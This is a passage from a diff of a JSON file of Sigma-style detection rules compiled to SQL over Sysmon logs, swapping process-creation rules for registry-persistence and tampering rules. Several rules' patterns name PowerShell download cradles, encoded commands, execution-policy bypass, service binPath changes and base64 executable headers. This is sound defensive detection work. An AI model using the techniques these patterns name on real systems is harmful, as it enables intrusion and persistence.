AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-FileInfoMinifilter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-ASN1\\\\%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Kernel-AppCompat\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Runtime\\\\Error\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-CAPI2/Operational\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Compat-Appraiser%' ESCAPE '\\'))) AND NOT ((Image = '') OR (Image = '')))" ], - "filename": "proc_creation_win_netsh_fw_delete_rule.yml" + "filename": "registry_set_disable_winevt_logging.yml" }, { - "title": "WSF/JSE/JS/VBA/VBE File Execution", - "id": "1e33157c-53b1-41ad-bbcc-780b80b58288", - "status": "test", - "description": "Detects suspicious file execution by wscript and cscript", - "author": "Michael Haag", + "title": "Suspicious Powershell In Registry Run Keys", + "id": "8d85cf08-bf97-4260-ba49-986a2a65129c", + "status": "experimental", + "description": "Detects potential PowerShell commands or code within registry run keys", + "author": "frack113, Florian Roth", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy." + "Legitimate admin or third party scripts. 
Baseline according to your environment" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('wscript.exe', 'cscript.exe') OR (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND (Details LIKE '%powershell%' ESCAPE '\\' OR Details LIKE '%pwsh %' ESCAPE '\\' OR Details LIKE '%FromBase64String%' ESCAPE '\\' OR Details LIKE '%.DownloadFile(%' ESCAPE '\\' OR Details LIKE '%.DownloadString(%' ESCAPE '\\' OR Details LIKE '% -w hidden %' ESCAPE '\\' OR Details LIKE '% -w 1 %' ESCAPE '\\' OR Details LIKE '%-windowstyle hidden%' ESCAPE '\\' OR Details LIKE '%-window hidden%' ESCAPE '\\' OR Details LIKE '% -nop %' ESCAPE '\\' OR Details LIKE '% -encodedcommand %' ESCAPE '\\' OR Details LIKE '%-ExecutionPolicy Bypass%' ESCAPE '\\' OR Details LIKE '%Invoke-Expression%' ESCAPE '\\' OR Details LIKE '%IEX (%' ESCAPE '\\' OR Details LIKE '%Invoke-Command%' ESCAPE '\\' OR Details LIKE '%ICM -%' ESCAPE '\\' OR Details LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR Details LIKE '%IWR %' ESCAPE '\\' OR Details LIKE '% -noni %' ESCAPE '\\' OR Details LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_script_execution.yml" + "filename": "registry_set_powershell_in_run_keys.yml" }, { - "title": "Suspicious Sigverif Execution", - "id": "7d4aaec2-08ed-4430-8b96-28420e030e04", + "title": "New Root or CA or AuthRoot Certificate to Store", + "id": "d223b46b-5621-4037-88fe-fda32eead684", "status": 
"experimental", - "description": "Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the addition of new root, CA or AuthRoot certificates to the Windows registry", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sigverif.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Blob' ESCAPE '\\' AND Details = 'Binary Data')" ], - "filename": "proc_creation_win_lolbin_sigverif.yml" + 
"filename": "registry_set_install_root_or_ca_certificat.yml" }, { - "title": "Potential PowerShell Downgrade Attack", - "id": "b3512211-c67e-4707-bedc-66efc7848863", - "status": "test", - "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", - "author": "Harish Segar (rule)", + "title": "Scripted Diagnostics Turn Off Check Enabled - Registry", + "id": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", + "status": "experimental", + "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1059.001" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator actions" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\powershell.exe' ESCAPE '\\' AND (CommandLine LIKE '% -version 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versio 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versi 2 %' ESCAPE '\\' OR CommandLine LIKE '% -vers 2 %' ESCAPE '\\' OR CommandLine LIKE '% -ver 2 %' ESCAPE '\\' OR CommandLine LIKE '% -ve 2 %' ESCAPE '\\' OR CommandLine LIKE '% -v 2 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\ScriptedDiagnostics\\\\TurnOffCheck' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_powershell_downgrade_attack.yml" + "filename": "registry_set_enabling_turnoffcheck.yml" }, { - "title": "Possible Privilege Escalation via Weak Service Permissions", - "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", - "status": "test", - "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service 
ImagePath or FailureCommand", - "author": "Teymur Kheirkhabarov", + "title": "Disable Privacy Settings Experience in Registry", + "id": "0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", + "status": "experimental", + "description": "Detects registry modifications that disable Privacy Settings Experience", + "author": "frack113", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate admin script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE\\\\DisablePrivacyExperience' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" + "filename": "registry_set_disable_privacy_settings_experience.yml" }, { - "title": "Execution via WorkFolders.exe", - "id": "0bbc6369-43e3-453d-9944-cae58821c173", - "status": "test", - "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", - "author": "Maxime Thiebaut (@0xThiebaut)", + "title": "Register New IFiltre For Persistence", + "id": "b23818c7-e575-4d13-8012-332075ec0a2b", + "status": "experimental", + "description": "Detects when an attacker register a new IFilter for an exntesion. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. 
You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence" ], "falsepositives": [ - "Legitimate usage of the uncommon Windows Work Folders feature." + "Legitimate registration of IFilters by the OS or software" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentHandler%' ESCAPE '\\') OR (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentAddinsRegistered\\\\{89BCB740-6119-101A-BCB7-00DD010655AF}%' ESCAPE '\\')) AND NOT (((TargetObject LIKE '%\\\\CLSID\\\\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{4887767F-7ADC-4983-B576-88FB643D6F79}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{098f2470-bae0-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}\\\\%' 
ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{2e2294a9-50d7-4fe7-a09f-e6492e185884}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{3B224B11-9363-407e-850F-C9E1FFACD8FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{58A9EBF6-5755-4554-A67E-A2467AD1447B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5e941d80-bf96-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{698A4FFC-63A3-4E70-8F00-376AD29363FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{9694E38A-E081-46ac-99A0-8743C909ACB6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{98de59a0-d175-11cd-a7bd-00006b827d94}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{B4132098-7A03-423D-9463-163CB07C151F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{d044309b-5da6-4633-b085-4ed02522e5a5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D169C14A-5148-4322-92C8-754FC9D018D8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{DD75716E-B42E-4978-BB60-1497B92E30C4}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E772CEB3-E203-4828-ADF1-765713D981B8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{eec97550-47a9-11cf-b952-00aa0051fe20}%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\CLSID\\\\{FB10BD80-A331-4e9e-9EB7-00279903AD99}\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_workfolders.yml" + "filename": "registry_set_persistence_ifilter.yml" }, { - "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", - "id": "044ba588-dff4-4918-9808-3f95e8160606", + "title": "Change Winevt Event Access Permission Via Registry", + "id": "7d9263bd-dc47-4a58-bc92-5474abab390c", "status": "experimental", - "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", + "author": "frack113", "tags": [ - "attack.credential_access" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ChannelAccess' ESCAPE '\\' AND (Details LIKE '%(A;;0x1;;;SY)%' ESCAPE '\\' OR Details LIKE '%(A;;0x5;;;BA)%' ESCAPE '\\' OR Details LIKE '%(A;;0x1;;;LA)%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' 
ESCAPE '\\') OR (Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" + "filename": "registry_set_change_winevt_channelaccess.yml" }, { - "title": "Suspicious New Instance Of An Office COM Object", - "id": "9bdaf1e9-fdef-443b-8081-4341b74a7e28", + "title": "Potential Persistence Via Visual Studio Tools for Office", + "id": "9d15044a-7cfe-4d23-8085-6ebc11df7685", "status": "experimental", - "description": "Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc.\nThis can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", - "attack.defense_evasion" + "attack.t1137.006", + "attack.persistence" ], "falsepositives": [ - "Legitimate usage of office automation via scripting" + "Legitimate Addin Installation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\Software\\\\Microsoft\\\\Office\\\\Word\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Excel\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Powerpoint\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\VSTO\\\\Security\\\\Inclusion\\\\%' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\integrator.exe' ESCAPE '\\' OR Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_office_svchost_parent.yml" + "filename": "registry_set_persistence_office_vsto.yml" }, { - "title": "Potential DLL Sideloading Via DeviceEnroller.EXE", - "id": "e173ad47-4388-4012-ae62-bd13f71c18a8", + "title": "Potential Persistence Via Excel Add-in - Registry", + "id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", "status": "experimental", - "description": "Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. 
This non-existent DLL file is named \"ShellChromeAPI.dll\".\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", - "author": "@gott_cyber", + "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\deviceenroller.exe' ESCAPE '\\' OR OriginalFileName = 'deviceenroller.exe') AND CommandLine LIKE '%/PhoneDeepLink%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Excel\\\\Options' ESCAPE '\\' AND Details LIKE '/R %' ESCAPE '\\' AND Details LIKE '%.xll' ESCAPE '\\')" ], - "filename": "proc_creation_win_deviceenroller_dll_sideloading.yml" + "filename": "registry_set_persistence_xll.yml" }, { - "title": "HackTool - PowerTool Execution", - "id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", + "title": "Potential Persistence Via Custom Protocol Handler", + "id": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", "status": "experimental", - "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", + "description": "Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. 
And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PowerTool.exe' ESCAPE '\\' OR Image LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" - ], - "filename": "proc_creation_win_hktl_powertool.yml" - }, - { - "title": "Obfuscated IP Download", - "id": "cb5a2333-56cf-4562-8fcb-22ba1bca728d", - "status": "experimental", - "description": "Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.discovery" + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate applications registering a new custom protocol handler" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\') AND ((CommandLine LIKE '%//0x%' ESCAPE '\\' OR CommandLine LIKE '%.0x%' ESCAPE '\\' OR CommandLine LIKE '%.00x%' ESCAPE '\\') OR (CommandLine LIKE '%http://\\%%' ESCAPE '\\' AND CommandLine LIKE '%\\%2e%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKCR\\\\%' ESCAPE '\\' AND Details LIKE 'URL:%' ESCAPE '\\') AND NOT ((Details LIKE 'URL:ms-%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files 
(x86)%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_obfuscated_ip_download.yml" + "filename": "registry_set_persistence_custom_protocol_handler.yml" }, { - "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", - "id": "56c217c3-2de2-479b-990f-5c109ba8458f", - "status": "test", - "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", - "author": "Markus Neis, @Karneades", + "title": "Add Debugger Entry To Hangs Key For Persistence", + "id": "833ef470-fa01-4631-a79b-6f291c9ac498", + "status": "experimental", + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.privilege_escalation", - "attack.s0111", - "attack.g0022", - "attack.g0060", - "car.2013-08-001", - "attack.t1053.005", - "attack.t1059.001" + "attack.persistence" ], "falsepositives": [ - "Unlikely" + "This value is not set by default but could be rarly used by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC ONLOGON%' ESCAPE '\\' OR CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 
'%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\Hangs\\\\Debugger%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" + "filename": "registry_set_hangs_debugger_persistence.yml" }, { - "title": "JSC Convert Javascript To Executable", - "id": "52788a70-f1da-40dd-8fbd-73b5865d6568", - "status": "experimental", - "description": "Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format", - "author": "frack113", + "title": "Suspicious Environment Variable Has Been Registered", + "id": "966315ef-c5e1-4767-ba25-fce9c8de3660", + "status": "test", + "description": "Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.persistence" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\jsc.exe' ESCAPE '\\' AND CommandLine LIKE '%.js%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Environment\\\\%' ESCAPE '\\') AND (Details IN ('powershell', 'pwsh') OR (Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR Details LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR Details LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR Details LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR Details LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\' OR Details LIKE '%SW52b2tlL%' ESCAPE '\\' OR Details LIKE '%ludm9rZS%' ESCAPE '\\' OR Details LIKE '%JbnZva2Ut%' ESCAPE '\\' OR Details LIKE '%SQBuAHYAbwBrAGUALQ%' 